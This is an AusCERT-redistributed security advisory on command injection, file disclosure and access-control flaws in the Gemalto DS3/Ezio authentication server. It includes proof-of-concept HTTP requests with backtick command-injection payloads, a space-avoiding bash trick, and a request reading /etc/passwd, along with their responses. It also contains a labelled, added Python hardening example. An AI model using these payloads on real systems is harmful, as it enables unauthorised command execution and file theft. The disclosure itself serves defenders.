-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2019.1642
          Multiple Vulnerabilities in Gemalto (Thales Group) DS3
                    Authentication Server / Ezio Server
                                10 May 2019

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Gemalto DS3 Authentication Server / Ezio Server
Publisher:         SEC Consult
Operating System:  Linux variants
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account
                   Access Confidential Data        -- Existing Account
                   Unauthorised Access             -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2019-9158 CVE-2019-9157 CVE-2019-9156
                   CVE-2019-915  

Original Bulletin: 
   https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-gemalto-thales-group-ds3-authentication-server-ezio-server/

- --------------------------BEGIN INCLUDED TEXT--------------------

Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server /
Ezio Server


Project Description

SEC Consult identified multiple vulnerabilities within the DS3 Authentication
Server (now called Gemalto Ezio Server, part of the Thales Group) which can be
chained together to allow a low-privileged application user to upload a JSP web
shell with the access rights of a low-privileged Linux system user.

- -------------------------------------------------------------------------------

Vendor description

DS3 Authentication Server is an appliance that provides authentication and
end-to-end encryption for online banking and remote transactions. DS3 has been
acquired by Gemalto, and the Authentication Server is now known as the Gemalto
Ezio Server. Gemalto is now part of the Thales Group.

Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source: https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital

 

Business recommendation

The vendor provides a patch and users of this product are urged to upgrade to
the latest version available.

An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected by further security issues.

 

Vulnerability overview/description

The DS3 Authentication Server is prone to several security issues, described
below, which when combined allow a low-privileged application user to upload a
JSP web shell with the access rights of the low-privileged Linux system user
"asadmin".

The CVSSv3 scores have been provided by the vendor.

1) Semi-Blind OS Command Injection (Post-authenticated)

  o CVE-2019-9156
  o CWE-78
  o CVSSv3: 6.8 (Medium) - https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

The DS3 Authentication Server provides several administration tools to perform
connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the
user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an
attacker to execute arbitrary commands on the server side with the privileges
of the local system user "asadmin".

2) Limited Local File Disclosure (LFD) (Post-authenticated)

  o CVE-2019-9157
  o CWE-538
  o CVSSv3: 5.7 (Medium) - https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

The DS3 Authentication Server provides several administration tools to check
the system's access and error logs. "TailLogs.jsp" does not correctly validate
the user input for the "LOG_TYPE" parameter, allowing an attacker to read
arbitrary local files with the privileges of the local system user "asadmin".

3) Broken Access Control (Post-authenticated)

  o CVE-2019-9158
  o CWE-284
  o CVSSv3: 5.7 (Medium) - https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

The DS3 Authentication Server provides several permission groups, granting
different levels of privileges, from the administrative "dsssAdmin" group to
the low privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see
more functions in the menu of the web portal than a user with the "READ_ONLY"
group. However, the user with the "READ_ONLY" group can access some "dsssAdmin"
functions by replaying the POST or GET request directly.

 

Proof of concept

1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)

This POC was performed using a user with the "READ_ONLY" group permission.

This exploit also has the following two restrictions:

 1. The injected bash commands cannot contain any space character (' '/%20).
 2. The output of the injected bash commands must be empty or must not contain
    any space character (' '/%20). However, the tester was able to build
    complex bash command payloads without any space (' '/%20) by using a bash
    trick.

Below, the simple OS command payload "whoami" is injected into the HOST_NAME
parameter, and the HTTP response shows the result of the payload ("asadmin")
mixed into the output. Please note that the OS command payload is enclosed in
backtick (`) characters.

POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

CSRFTOKEN=&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&TEST_RESULTS=%0D%0A%09%09%09%09%09%09


HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 12987

...
<textarea cols="80" name="TEST_RESULTS" readonly="readonly" rows="10">Start time     : ... SGT 2019
End time       : ... SGT 2019
Time taken (ms): 3
Attempting connection to 127.0.0.1`whoami` on port 8443
...
127.0.0.1asadmin/8443: Temporary failure in name resolution
Error connecting to 127.0.0.1`whoami` on port 8443
Successful connection to 127.0.0.1`whoami` on port 8443
     </textarea>
...

Below, a complex bash command payload without any space (' '/%20), equivalent
to "ls -1 | tail -1", is injected into the PORT_NUMBER parameter, and the HTTP
response shows the result of the payload ("liquibase.out") mixed into the
output. Please note that the OS command payload is enclosed in backtick (`)
characters.

POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 173

CSRFTOKEN=&HOST_NAME=127.0.0.1&PORT_NUMBER=8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`&TEST_RESULTS=%0D%0A%09%09%09%09%09%09


HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 13159
...
<textarea cols="80" name="TEST_RESULTS" readonly="readonly" rows="10">Start time     : ... SGT 2019
End time       : ... SGT 2019
Time taken (ms): 8
Attempting connection to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
127.0.0.1/8443liquibase.out: Servname not supported for ai_socktype
Error connecting to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
Successful connection to 127.0.0.1 on port 8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
      </textarea>
...

2) Limited Local File Disclosure (LFD) (Post-authenticated) (CVE-2019-9157)

This POC was performed using an admin user with the dsssAdmin group permission,
as the ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility function
is not accessible to users with the READ_ONLY group permission.

This exploit has the following two restrictions:

 1. Only the last 10 lines of the file are displayed.
 2. Directory traversal is not possible, as the parameter cannot contain two
    dot (.) characters.

However, the tester was able to bypass the directory traversal restriction by
injecting the arbitrary filename as an additional argument, rather than
modifying the first argument.

Below, the file /etc/passwd is injected into the LOG_TYPE parameter and the
response returns the last 10 lines of the file. Please note that the injected
filename is preceded by the + character, which decodes to a space in the query
string and thus separates it from the first argument.

GET /ServerAdmin/TailLogs.jsp?LOG_TYPE=+/etc/passwd&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=0&CSRFTOKEN=<csrf_token> HTTP/1.1
Host: $IP
Cookie: JSESSIONID=<jsessionid_cookie>


HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Content-Length: 3702
Server: DS3-AuthServer

...
<TR Border=0 Align="LEFT">
<TD COLSPAN=2>
<TEXTAREA READONLY ROWS="20" COLS="80" NAME="TAIL_LOGS">
==> /home/data/log/ <==

==> /etc/passwd <==
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:501:501::/home/mysql:/sbin/nologin
asadmin:x:502:502::/home/asadmin:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
hacluster:x:498:503::/var/lib/heartbeat/cores/hacluster:/sbin/nologin
haproxy:x:503:504::/home/haproxy:/sbin/nologin
</TEXTAREA>
</TD>
...


3) Broken Access Control (Post-authenticated) (CVE-2019-9158)

The admin user with the "dsssAdmin" group permission is able to access the
following chain of functions in the menu of the web portal.

  o ADMINISTRATION -> Log Manager -> View Log
  o ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

The user with the READ_ONLY group permission is not able to access the
following chain of functions in the menu of the web portal.

  o ADMINISTRATION -> Log Manager -> View Log

Based on the web portal, a user with the "READ_ONLY" group permission should
therefore also not be able to access the following chain of functions.

  o ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

However, it was noted that a user with the READ_ONLY group permission is able
to access the Tail Logs Utility function with the GET request (captured from
the dsssAdmin user's request) directly with the READ_ONLY user's session cookie
and CSRFTOKEN token.

https://$IP/ServerAdmin/TailLogs.jsp?LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN=<csrf_token>

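The three issues share one root cause: request parameters reach a shell or a file path unvalidated, and page access is enforced only by menu visibility. The following added Python example (not SEC Consult's or Gemalto's code) shows the server-side handling a defender would expect: deny-by-default authorisation per request, strict allow-list validation of HOST_NAME, PORT_NUMBER and LOG_TYPE, and an argument vector built for execution without a shell. The group, page and parameter names are from the advisory; the authorisation map, log-file paths and the nc-based connectivity command are assumptions.

```python
"""Hardened handling for the two admin tools named in the advisory (added example)."""
import ipaddress
import re

# Deny by default: a page is reachable only if listed for the caller's group.
# Which groups may use which tool is assumed here, not the product's real policy.
ALLOWED_PAGES = {
    "dsssAdmin": {"/ServerAdmin/TestTelnetConnection.jsp", "/ServerAdmin/TailLogs.jsp"},
    "READ_ONLY": set(),
}
# LOG_TYPE is a key into this table and is never used as a path fragment (paths assumed).
LOG_FILES = {"audit.log": "/home/data/log/audit.log", "error.log": "/home/data/log/error.log"}
# RFC 1123 hostname: only letters, digits, hyphen and dot, so `, $, ;, | and space never match.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
PORT_RE = re.compile(r"^[0-9]{1,5}$")

def valid_host(value):
    """Accept an IP literal or a hostname; anything else (e.g. 127.0.0.1`whoami`) is rejected."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None

def valid_port(value):
    return PORT_RE.match(value) is not None and 1 <= int(value) <= 65535

def build_request(group, page, params):
    """Return (True, argv) for a request that may run, or (False, reason).
    argv is intended for subprocess.run(argv) with no shell, so a validated value
    can only ever become a single argument, never a command or a second file."""
    if page not in ALLOWED_PAGES.get(group, set()):
        return False, "forbidden"  # checked on every request, not via menu visibility
    if page.endswith("TestTelnetConnection.jsp"):
        host, port = params.get("HOST_NAME", ""), params.get("PORT_NUMBER", "")
        if not (valid_host(host) and valid_port(port)):
            return False, "bad HOST_NAME/PORT_NUMBER"
        return True, ["nc", "-zv", "-w", "3", host, port]
    if page.endswith("TailLogs.jsp"):
        path = LOG_FILES.get(params.get("LOG_TYPE", ""))
        if path is None:
            return False, "unknown LOG_TYPE"  # "+/etc/passwd" never reaches tail
        return True, ["tail", "-n", "10", path]
    return False, "unhandled page"
```
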
Vulnerable / tested versions

The following version has been tested and found to be vulnerable:

  o 2.6.1-SP01

The following version was confirmed to be vulnerable by the vendor:

  o All versions earlier than v3.1.0

 

Vendor contact timeline

2019-02-27  Contacting vendor through csirt@gemalto.com (Gemalto CERT)
2019-03-08  Gemalto CERT confirmed the vulnerabilities for DS3/Ezio Server
            version 2.8.0-update01 and earlier. Requested 2 months disclosure
            embargo period to implement fix for future release.
2019-03-22  Gemalto CERT confirmed the fix for the reported vulnerabilities to
            be included in current sprint and provided CVSSv3 scoring and CWE
            assigned.
2019-03-22  Provided Gemalto CERT with attacker-centric CVSSv3 metrics.
2019-04-05  Gemalto CERT provided updated CVSSv3 metrics.
2019-04-18  Gemalto CERT informed that the fix for the 3 vulnerabilities was
            planned in the upcoming Ezio DS3 server v3.1.0 release by 1st
            week of May, and asked for extension of embargo period.
            Furthermore, Gemalto is now part of the Thales Group.
2019-05-06  Patches available
2019-05-09  Coordinated release of security advisory.

 

Solution

According to the vendor, the patches are provided to the Support Team L2 and
Professional Services team, and those teams will get in touch with the technical
contacts of the customers. The update will also be announced via a future
newsletter.

Furthermore, SEC Consult have been informed that the 2.x branch of the Ezio DS3
server is not fixed yet and that a patch will be available at a later date. In
the meantime, customers are reminded of the deployment guidelines to reduce
their attack surface.

 

Workaround

As the vulnerabilities require authentication with valid credentials to the
portal, it is recommended to deploy the application in a trusted zone and to
restrict access to the customer's internal secure network.

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

EOF TING Meng Yean / @2019


Project Details

  o Title: Multiple vulnerabilities
  o Product: Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
  o Vulnerable version: Ezio DS3 server <v3.1.0
  o Fixed version: Ezio DS3 server v3.1.0
  o CVE number: CVE-2019-9156, CVE-2019-9157, CVE-2019-9158
  o Impact: Medium
  o Homepage: https://www.gemalto.com
  o Found: 2019-02-11
  o By: TING Meng Yean (Office Singapore) | SEC Consult Vulnerability Lab

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----